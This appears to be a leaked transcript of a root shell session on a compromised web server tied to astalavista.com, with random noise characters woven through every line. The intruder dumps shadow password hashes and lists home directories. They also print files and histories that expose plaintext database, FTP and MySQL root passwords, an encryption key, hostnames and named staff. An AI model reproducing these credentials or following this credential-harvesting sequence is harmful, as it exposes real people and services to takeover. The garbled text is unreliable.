% F- b8 K+ h. v- l+ `( ]' Ojon 1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
! r+ e+ X+ ^6 o2 t3 b9 xcom 1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::! |5 [3 A: `3 W
astanet 1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::9 W0 w; X! K1 I* K" R
& M1 K- ` h0 ?, X. L. ?5 Ish-3.2# cat /etc/motd, |7 ~& E2 ~' t
#####################################################
( F, s+ R& u! N9 G#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #2 y5 q! v6 c: P! S$ P, P6 G
# |__| [__ | |__| | |__| | | | [__ | |__| #/ e5 Y Q! `7 z, B- A+ O ] W8 r
# | | ___] | | | |___ | | \/ | ___] | | | #
5 o0 u6 O7 _* O* Y% B. ]* `# #
$ B4 ]2 R8 E; p- B#####################################################: O5 B$ R3 b; X& h8 U
# #/ w' u7 y% }" K0 ]# [7 l2 X1 X7 V; U& |) Z( y
# Admin Contact - 链接标记support@secureservertech.com #$ X r6 X0 F, L) E4 H6 S
# #
1 T. g2 o/ v# Y/ i# Available ShortCuts #: P9 N, F5 f9 \( b7 y1 p2 c
# #
0 p! L/ U* A+ \, G# nst - list active connections #
+ T% h/ h: B0 s/ X6 f0 `0 A# ddos - shows how many times each ip is connected #
; H6 G ?+ n c+ `% q0 ~# L# ltr - restart the webserver #
# I1 A1 `( \- _* [6 D4 d2 c# phpc - edit the php config file #1 Z4 t: o# B3 `- i; D6 y& `
# htc - edit the webserver configuration file #
8 n' @$ i0 M; D! }# up - uptime #: L3 V7 n) w) x4 ?6 H
# etd - edit the motd of the day file # k# s3 _% M) I
# htr - start and restart apache if needed #3 e+ y' K; }' z" y ]5 z, a
# syng - shows active SYN_RECV connections #: ]- c! z2 w5 {+ k2 v
# synd - syn flood blocker - “synd -h” for usage #
6 G+ U& m; |# w% f2 K A! m#####################################################, `8 r) B( \8 G" }( P
# NOTES: #
# K% b8 s! m3 \8 d# Last Upgrade - 12-08-2008 by JF #
" L: q7 B+ c& X0 j+ y7 I# k# My.cnf/Mysql Optimization - 1-28-09 #* ]; J# P. H$ H$ q' d9 ~
# #( T/ t/ ^2 a8 \/ w3 ^
# #
6 A1 F$ b" R. @- F) r# #+ }/ h! ?& a2 I( v
#####################################################
% ~$ N Y" l' e7 G$ C6 L8 r1 C8 z) @" A# J9 Q: @! z) K
sh-3.2# lastlog | grep -v Never
7 o# g; X/ {* b# B9 G0 yUsername Port From Latest% h% d3 L9 `- J9 x8 j* E q1 O3 ~
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
! K1 i6 w% P8 {! U0 G6 w1 iadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
5 [) u( ~% f" f% ?, d* N6 k1 C# Ocom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
8 b, K1 |* @) y' n* c0 r* Wastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
2 b$ |0 h, w4 o0 ]# ]' h6 I+ J1 u: ?% X5 F+ k0 i# `
sh-3.2# ls -la: o, e3 F- g/ F" b$ _% J- w
total 453376
, U* P! [# ~7 h v! rdrwxr-x— 15 root root 4096 Jun 4 08:40 .; a& n$ {9 D* F$ T {
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..0 C8 s3 H6 S0 y
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip+ p4 r& z$ w: N2 B7 E' R; @
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg% I$ r9 z( J' v& d+ }
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
4 j: L; F: N) @7 h6 V4 Y% v+ D-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
! ^: e% p( I4 a. a6 [: }8 `-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile0 i- R+ A. K1 A5 J; Q: m5 d# ?# W" F
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc. k& J, \+ a( t
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
6 E8 Z2 V& j4 v- i-rw-r–r– 1 root root 1327 Nov 29 2007 cert# g: M7 J8 c: i5 \+ \+ l4 i
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
7 c* S( _" |/ Z- h5 A5 D7 u5 ^drwxr-xr-x 4 root root 4096 May 20 2008 .cpan& c2 G8 w X4 `% Z5 J) s
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc3 }6 ]4 E5 o* F2 ~. ] N4 E
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
% ]: K2 X# r" W( Q+ vdrwx—— 2 root root 4096 Oct 28 2007 .elinks$ [3 l4 \0 M. l. |) Y
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
4 T; p. P# l8 ^5 K d0 j3 ~-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz26 |+ o% s: X# W# E/ I
-rw——- 1 root root 0 Apr 16 13:19 .history; u/ r2 ^3 E* f8 Y7 W
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
) x' d) \3 D: }) P-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog1 X4 u6 n, x# b7 M. q6 v* @
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
- _- |( l" m5 T+ d/ g/ C-rw——- 1 root root 35 Jun 2 14:23 .lesshst
0 `: ~: m/ L' X4 c+ W0 ^drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
. \( e: D& I6 ~# ]drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
6 z/ A1 k" {' m7 a+ I* V-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz- |! ^ e# w& i/ q; s- u' Q
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2+ H0 w6 ?; G# c$ T8 ?3 g8 W
-rwx—— 1 root root 760 Sep 18 2008 lp8 X3 H" {+ Y; k) _& m
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.16 G/ C7 g+ H f# y. F+ Z
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
" X2 s: o* ~$ |, K$ ]: F/ q" q7 e- b-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
7 I1 }, `& p2 A1 N8 Wdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9" g) ^) @; j# {1 o
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz; a# z% [" ?0 b6 M" u7 M
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
4 {8 I/ N2 Z0 Q+ b$ W7 a% @-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz, }1 b7 n z3 |9 i) b- j. l
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh$ n" @3 v) s/ F4 W, k2 y. a. d- p
-rw——- 1 root root 41 Oct 19 2007 .my.cnf7 ~2 r) B& U! W5 b# L8 U
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
; e, ^; o7 s1 [: W1 I* F: C-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
0 Q2 i3 d, k% o-rw——- 1 root root 41 May 20 2008 .mytop. L2 S0 g7 [* x5 `+ M( t- i! [7 p3 j
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
0 I y; v1 r$ S7 I `7 _# r3 P" J-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz1 x6 [8 R, Y1 _8 p
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
0 Z `' k. o0 h) h& g4 W# [% P-rw——- 1 root root 1462 Sep 21 2007 opt.php
7 A. A6 T7 z3 Z$ p6 w: I( G-rw-r–r– 1 root root 3371 Sep 22 2007 p2 C+ ]! g9 K/ y- s
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
' }% K& Z! t H; y4 x-rw——- 1 root root 1024 Feb 3 21:32 .rnd
3 K/ G2 p7 I8 L) F+ N5 h-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
9 S x8 T/ d1 o E- Z-rw-r–r– 1 root root 887 Nov 28 2007 server.key
* y( A8 d8 B# n1 H% ^drwx—— 2 root root 4096 Oct 10 2008 .ssh0 }6 D1 L7 \) g. V0 C4 s
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
6 a: A Q8 t( Q- v-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc1 S, `; ^) j0 H
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip3 [3 `, d) A3 v1 w% C* T1 W& D. ^
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
- l2 ] c' {& `drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
- w: M2 Y# m. k" [ T) ~-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
D1 D L8 S* U" E+ j' n8 C+ ^drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.05 I2 H2 a T9 ^$ q
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz23 O8 o5 ^' N5 n- s8 j7 F
-rw——- 1 root root 12997 May 16 2008 .viminfo
5 w, B3 g+ D# q! G. f6 _: f7 u& Q0 b" ?/ m6 E3 y0 u
sh-3.2# cat .bash_history7 O& B T/ h4 A/ b3 }. X
[snip]
' v, U! o0 X, E: _) N( Fwget cp4sst.com/sstlinux.tar.gz9 u' W1 r6 h3 ]8 \4 V; Y' i: G
tar zxvf sstlinux.tar.gz
- T5 u/ t$ _" bcd linux-2.6.27.10
. v* R' p/ Z% R7 Ssh install.sh
7 u; r# A; T7 q0 o8 k- G: umake bzImage ; make modules ; make modules_install ; make install
4 f. c+ a, B' \: N0 a* Jmake clean: j* E4 l D+ i# @
service mysqld restart
; O, Y+ V' I! F+ t[snip]
* e, d: I( S0 ^9 Q3 J. u% y7 ncd /usr/sbin/. w! U$ _" |6 e
chmod 4777 traceroute+ _* c" m8 }6 ]9 c1 E
chmod 4777 ping$ a$ e6 ^+ C* p1 K( z
traceroute -I 链接标记[url]www.astalavista.ch[/url]& \' o$ R) Y3 P9 [ m
[snip]
9 f- j* D/ |& ?( Fvi /etc/csf/csf.conf- s" j( j6 J- _. O2 O3 m; |6 n% c
traceroute google.ch! z3 {& x$ ^7 W2 x2 ?$ O
service csf restart5 A$ v3 I$ K2 p( u6 ^* K1 v% G
tracert google.ch
7 D3 Q; l* u. z Tservice csf restart
) U* b- H; K( b3 btraceroute 链接标记[url]www.google.ch[/url]
7 m' V0 X& |8 Etracert 链接标记[url]www.google.ch[/url]
2 w! C* Q) c! R& C5 T" Dtraceroute 链接标记[url]www.google.ch[/url]
: v2 O1 R M" b! [) Klocate traceroute
( k- t# ~1 E# U. k* m# _. D& ochown 4755 /bin/traceroute0 R4 R% y! \+ C* s ~1 m
chown 4777 /bin/traceroute5 s9 ?' j- ~& g3 x2 S! L* Z
locate ping! ~$ g' U, G4 P% G! m8 }" N) |/ K
chown 4755 /bin/ping+ v( S1 F& A' }$ O/ K
chown 4777 /bin/ping$ t+ [/ F# g/ ^4 t5 g. h2 O# h3 f
cd /bin/$ j5 N$ K+ Z7 J8 {# N5 v* p
ls -ali | grep ping" @& @6 @) A; R. B: ^, z2 `* n
chown root ping
% b& X+ g; O, l$ x# p9 Bchmod 4755 ping
* T2 I% `: @5 n" ?# c3 Uls -ali | grep traceroute- g% T2 X( N; u" P+ h, ]4 S3 _
chown root traceroute3 {- @. J' A# }' L( }8 ?1 ]
chmod 4755 traceroute
8 K4 V( \8 j+ s3 m+ J3 k0 bls -ali | grep traceroute$ K1 z9 d& H+ s0 ^
traceroute -I 链接标记[url]www.google.ch[/url]
) r, v- n" }+ Z" O1 ptraceroute 链接标记[url]www.google.ch[/url]: T9 {1 M$ H& _+ j, o8 s
whois pmsantos.ch+ a2 v6 R S, Z% e' b9 @' |' @; \
[snip]( j0 U2 _% N! C3 [/ \% A
mysql -h com_contrexx2_live < /root/defaultp_ports.sql* N$ m! y5 r$ I v+ `) L
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
7 K7 C9 ]2 L1 P( C6 ]" U Xmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql% S/ {9 ^$ T/ A m8 b
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
) q) }) e# r' ]* s% Jtop* {: V9 F8 J5 Z
ping ssth.ch
5 E' i0 \+ o) X4 ]' ~+ z, _/ sping asdlkfaljgasd???ljg???lasj.ch
. ?+ s( k, O7 p' c' rping asdlkfaljgasdlasj.ch
& b& m' H, q" oping 链接标记[url]www.ssth.ch[/url]
7 S0 C/ [) b( Oping ssth.ch
) S( E) a% I) w$ N- w" _nslookup 链接标记[url]www.google.ch[/url]8 F) N U: P2 [ i( i! n& U( o
nslookup 链接标记[url]www.ssth.ch[/url]
8 i! K/ u; X) \2 P8 Q8 Lman nslookup# k. T3 [8 Y7 j6 I! V& N% ?
ping 链接标记[url]www.google.ch[/url], c+ N9 t0 w& [6 x
nslookup 链接标记[url]www.google.ch[/url]
. y5 ~& ^8 M8 J' mnslookup 链接标记[url]www.google.ch[/url]( @ H J+ i0 ]/ N/ p
nslookup salfjasdlf.ch
: _: u* c8 @; ~# |0 M1 h[snip]+ x2 n4 Y5 W+ |" ?# I
openssl passwd -1 sadf. G4 K& j# N( A; U. _
openssl passwd -1 5cZNHstdTy9 T2 C7 `( g' ]2 j: V/ B# C' h7 L; `
mysql
. T- s1 `* s J: ~5 lmysql+ N2 b' Z# e. w( X/ _
locate proftp' V+ O( u( T7 R/ O
vi /etc/proftpd.passwd
. X+ n. }8 ]9 D; }" n+ n" j' ]+ {service proftpd restart# w6 ^+ o4 s8 G) E/ S
locate proftpd.conf3 ?# J2 N$ i8 V3 A+ g
vi /etc/proftpd.conf' S$ Z! ]6 i% P" _5 ?3 U
vi /etc/proftpd.passwd2 d0 p, w ^2 I. F; Z- @7 E
service proftpd restart) i& S' n& ]9 C+ m9 j1 Z
[snip]
" r+ _% @. s4 F& s S/bin/sh /home/com/backup_system/backup.sh
/ z( ?. r K+ m# u7 htar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
+ F6 o, U. k- B W4 O! Qmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql h# s; G8 ]; S6 A2 W
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql& i- |% @) q% X
ls -ali
8 N4 x* ^; `9 amysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
9 P; K+ g) \3 u0 _0 smysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql5 m( Z9 q0 ~, R
crontab -l
% g% @" O) |& g A* ^. Lcrontab -l
! c9 A! w" B* {/ L, S L3 _: aphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
* A9 H. c) {/ I/home/com/public_html/modifications/cronjobs/exploits.sh
* W7 E5 t G: G: ]' z( _wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]: D# ^% V: ]5 T* t
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz6 M0 B. P I; {/ C- n/ H' K' t
cd lsws-4.0.33 i+ @+ V! s( }. _; S4 N, r+ P9 i
sh install.sh
' q) B8 k: E# C1 R; S# nuptime7 g/ a: U) z) P# j! A$ B
hdparm -tt /dev/sda
. x" D) g! G5 `% o" `' P oiostat0 h9 J& b# a) U) e, i+ L5 h
yum install iostat& Q4 Y2 C; C- e( R$ b j( p
iostat+ V1 n, ~# v1 ?& E9 q5 u( p
whereis iostat
, Q4 N8 Q5 a( o" b/ U* ~7 W4 ]yjm clean all2 T4 C! R3 K$ u/ I
yum clean all ; yum -y update
# U( V% Z8 R. U9 ^iostat- U1 Y; Z2 C, _: o: Z' _$ G
yum install systat4 e$ l7 `% W% ?
rpm -qa | grep iostat* x- N5 I2 J6 s2 F
rpm -qa | grep sysstat$ @. Z5 `2 x# ?9 M- w: u# u
rpm -qa | grep systat
8 d/ K# F/ L8 T/ Odmesg -c5 g- }1 i& o/ ~
sysctl -p
" M' \) q0 g& j3 s2 Guname -r
{ W- g& V, c0 e, j! A) ncd /usr/src
0 s+ }, f8 j' @. L d( B+ Nwget nix101.com/kernels/sstlinux.tar.gz J3 S! q( ? y( ~
shutdown -r now1 T. c9 _& A0 o- x" ]" ?9 K
nano -w /boot/grub/grub.conf9 l+ t* @" s; x |5 l# ?
; Q, l) K3 g* L, D9 \, ^
sh-3.2# cat .my.cnf
) _( k# I. X5 [" F# B* }1 k[client]; |7 i! ?; R+ g3 S0 C5 ~& z' P/ F
user=da_admin
* l" R D; Y; I3 [5 mpassword=X9dctmRH: W" s. r; ]* o) X
7 U! r7 F% D: C& k. a! g+ T3 ssh-3.2# cat /home/com/backup_system/backup.sh* R8 E7 F& v$ M0 q7 m/ E
#!/bin/sh8 ^/ v1 O; T( W7 M% }7 z
#####################################################################
. H) R( ^( f F5 L H7 A) N' V# #0 p& o# z9 o: p: A8 e2 n
# incremental backup for astalavista.com #7 ?" I' @' X/ i" W1 |
# #: r( p0 e) l. w
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
2 x, Y! Z; j+ `( Q) E/ g/ t X# #
/ S8 D( a9 S5 R" J#####################################################################
& M: R% I& i8 r, N( b( o0 w[snip]
+ ]7 D4 B$ s+ ~. z' z6 E {. G2 lPROG_DIR=”/home/com/backup_system”;4 F$ {. v. o4 I( s
BACKUP_DIR=”/home/com/backups”;
1 m( _0 N; L) wDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
|/ \" Q# e0 W& _: g# ftp for synology backup server# s; l3 [. j) h( a) I
FTP_HOST=”212.254.194.163″;3 Y! ^2 A# `; K: F- W
FTP_PORT=”21″;
! {8 Q6 W' a0 W3 A8 [9 Q1 N9 t# U dFTP_USER=”astalavista.com”;" H4 g# q; X% d# |5 ^2 l5 I6 l
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;8 t4 } m# Y$ o6 U1 k0 A
FTP_DIR=”/astalavista.com”;; o5 `0 j/ }5 k e: T; z0 a
# database/ Y9 O6 }9 Z% T9 W+ C ~; w* [
DB_HOST=”localhost”;( _ K; l2 _% \0 e0 E
DB_USER=”contrexxuser2″;" ]* g6 B* z: h7 i1 S9 O: z
DB_PASS=”0fEYNZgXz1pKe”;
$ E( h2 T( ], l5 }" e ]; qDB_DATABASE1=”com_contrexx2_live”;/ o0 k3 M. ?" [& }- q; h
DB_DATABASE2=”com_contrexx2″;4 q5 T, }9 X: z/ @' B
[snip]
6 k) j$ g. V( G) |2 L6 nftp -in $FTP_HOST $FTP_PORT <<EOF! v3 Q" J' }1 r5 n$ ~, \
quote USER $FTP_USER
' y* U& `; o9 L' T/ x+ vquote PASS $FTP_PASS
( c8 f7 J+ X3 R; Icd $FTP_DIR
% q5 J2 a; E$ J7 [# Uput $DB_FULLNAME-SQL_Dump.tar; ^2 F3 f" y1 j
put $BACKUP_FULLNAME-Public_HTML.tar
) i, d+ V9 n- n! I: t9 l1 T0 b3 Rclose
5 c! ^) a+ Y1 i/ h$ O5 Ybye6 z8 U' j- E3 V6 n V, Y- H
EOF# i1 u% Y) J' n* Q4 ? A8 D. X
) ]' O1 |, Z( b5 I1 P$ |8 z: csh-3.2# cd /home
0 R& I% v9 y2 z# S$ [8 J& v3 q. ^sh-3.2# ls -la% ^( x3 q( S/ e
total 120
3 V9 m5 B1 C; d r: jdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .2 X$ A. r: V# W. F
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
* x) K4 _( u b. Udrwx–x–x 9 admin admin 4096 Nov 28 2007 admin- C0 |1 u+ j$ p- ]& g4 ]( O
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group& G$ i* L: r# v
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
3 {4 D3 Q9 H8 v. ddrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
: [ r' `! F" I! w5 x Xdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup q; a" g ^3 M' O/ Z* P5 b3 i* c
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161 w3 D: U8 f* d4 z. Z
drwx–x–x 10 com com 4096 Apr 28 12:40 com
# J+ Z- a4 N0 T5 f9 Cdrwxr-xr-x 2 root root 4096 May 17 2007 ftp/ N t, A4 X6 T4 y7 z8 ~+ @
drwx—— 3 jon jon 4096 Sep 21 2007 jon6 p% z# E- [# x
drwx—— 2 root root 16384 Sep 11 2007 lost+found
# e2 R7 b" @ O4 T. K5 F4 Zdrwxr-xr-x 2 root root 4096 Sep 14 2007 my/ n; {, s) P. b
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata% P `0 G/ Y7 y$ J. J
drwx—— 2 jon jon 4096 Sep 15 2007 test' [7 c! @( J- X& \# U
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
" B0 m9 G/ g' D4 {0 I8 z5 X( a) M( [6 O
sh-3.2# cd admin
+ W6 n. H& O4 W$ V& _. u2 S) P! T, osh-3.2# ls -la2 m0 C, e7 X/ B2 c! ` g: L' V. m( T( v
total 1735896
, n0 N0 J) i9 L6 {$ v% ~drwx–x–x 9 admin admin 4096 Nov 28 2007 .: A$ q; Y6 E' v& O
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
8 Q3 } k' f% @" O5 M' ddrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups3 B; g6 E9 |8 i3 b& t
drwx—— 2 admin admin 4096 Sep 28 2007 backups$ R* N2 w! g% M, S) r& M
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
% l; m* U7 N V" B+ f6 D; H4 M-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
3 q' w5 e% X! {9 J-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
! t5 p5 M3 z+ K8 r& g0 k0 G3 e- v( V! R-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc! S8 ?" {: R; ^8 L1 I9 j
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
% _7 F5 c+ `" i4 o4 [drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
" y! F6 H3 t: Z0 k w% Edrwxrwx— 3 admin mail 4096 Sep 21 2007 imap
' @. {+ B0 |8 h$ F-rw-r–r– 1 root root 24 Sep 21 2007 info.php7 P8 P9 ]' p1 \# D6 g2 y0 {, k% L- |
drwx—— 2 admin admin 4096 Sep 21 2007 mail
5 S) Z( D# V/ i, Q# D5 _! `$ o-rw-r–r– 1 root root 716 Nov 28 2007 server.csr$ F8 \: Q X, S3 ?
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
8 O) n' `7 L8 r$ u# p( }-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
$ T. ^6 Q. F, n9 v Y# r-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
, t. ~4 |4 ~6 r jdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
) ~, E8 l' ^! c
' b3 j, P3 M7 P' Bsh-3.2# ..$ V! _$ X; f3 n5 c0 l% Y" r
sh-3.2# cd jon j# U; r) z) s! |
sh-3.2# ls -la$ y8 Q, ?' J" q* A" ?$ Z8 Q
total 36# B5 N) i x2 F8 K- R6 a% V0 I
drwx—— 3 jon jon 4096 Sep 21 2007 .; A! Q; L; V5 M& P, K
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
$ X! e$ B u" U+ y* w6 [-rw——- 1 jon jon 53 Sep 21 2007 .bash_history( k+ }: B9 p) U a
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout/ X, r$ N& Y! e# H
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile( m& b( `: A: a( P' v ?. D
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
, A! B) y! y" C* h9 u1 N-rw-r–r– 1 root root 24 Sep 21 2007 info.php
0 \6 P8 z# d# @, Mdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
3 l( v- {0 H, q2 E0 J7 u( a' ]) l4 A4 M, \' T
sh-3.2# cd ..' C! w9 a' j4 O6 h q6 {
sh-3.2# cd test, k6 ?" |2 U9 [1 z! H0 x; J! r& H
sh-3.2# ls -la4 E* W9 S+ }* m3 t- Q5 p0 ~* Y+ Z
total 48; k) N3 B% u2 E+ O: ~0 j6 _
drwx—— 2 jon jon 4096 Sep 15 2007 .4 F* w4 b' D: w# E+ W0 [
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
8 V" f1 {8 f, ` f1 B-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
# e: l& v* g- _. w2 P: Y$ w-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
( v7 o" x8 Z1 d$ x-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile" q5 P1 v f& {
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc! A! G% A) E8 F
sh-3.2# cat .bash_history- M; W t! a, N
/usr/bin/mysqladmin -u root password PoliuJhytg67
2 p" h& q" Y: E% L
7 S: K& Z- g) }. _! jsh-3.2# cd ..9 a, y/ [( k; X7 }
sh-3.2# cd astanet2 `! N9 U6 d% a, N
sh-3.2# ls -la
) p1 D% k! j" T" N" k( Ytotal 526 ?+ v' W& Q( A6 o H
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
( ?9 N+ b# {3 W! Y ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 ../ D, ?# @, j% _( Q+ w# g
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
0 f: f; @6 ?0 ?" C-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
7 j" c6 W2 s8 \: H-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
) P; _8 C+ ` ^* G3 L-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile' @& A1 F$ r, D% F, R* _+ c1 ~
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
* w7 S* M/ l6 [/ P: }( J) Ydrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
1 _3 L" x; m: h0 v# r( Xdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
0 j/ z) f5 l* {$ f J! Pdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail0 R# o2 c- f3 V# a% p3 H6 n2 g/ f
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history, Y9 C8 c* q% _7 f5 I
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html/ S6 Q/ a0 Y: q' T
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow, A8 |+ A$ G( R- {( w4 o6 A
! r; p; n }* g2 [sh-3.2# cd auth/
; F" f: P8 Q9 A% Zsh-3.2# ls -la
% p% e: Y# e) M5 O; ttotal 28
3 y$ d0 O+ n6 D) t/ e* @drwxr-xr-x 2 root root 4096 Dec 23 16:00 .+ D* d2 V6 T1 P6 I; ]. f8 U
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..6 e& z) G! H; g1 L" [
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
9 b5 @. m4 h) _7 e, C-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
: _7 Z T) a, D( [-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
# A" M. U$ {3 V% @' U-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
: K3 H3 D0 n. | u6 X-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
$ M3 q5 s2 A: \' \( I6 U7 [0 v4 Q
sh-3.2# cat hackercontest.config.inc.php
$ N$ Z. A5 \- u. m<?PHP2 q, A4 S! V# G+ @% o
// Variabeln f?r Verbindung zur Datenbank //3 ?" x6 _) C' C2 R
$conxHost = ‘localhost’; // MySQL hostname' W" w! H* I+ g) Y1 G: j
$conxUser = ‘hackercontest’; // MySQL user
5 }2 j* g7 v- q, Q3 a" h5 k$conxPassword = ‘K6m@7dUc’; // MySQL password0 ^9 [6 `0 Z: P5 Z
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
; B& V5 m* N4 S) E$ k$ k?>! I9 z) H* j8 |/ Q0 p5 P* c( j
sh-3.2# cat hosting.config.inc.php
% @9 s* A" W; n) }<?PHP& L) Z2 H6 j# C; v. p9 j# M
// Variabeln f?r Verbindung zur Datenbank //
7 k( r, b$ z% q* q! k# O$conxHost = ‘localhost’; // MySQL hostname/ D" }9 W" y! p: g
$conxUser = ‘hostinguser’; // MySQL user
! ]: X5 N) @7 W3 P: v1 Y$conxPassword = ‘cXvB3981′; // MySQL password
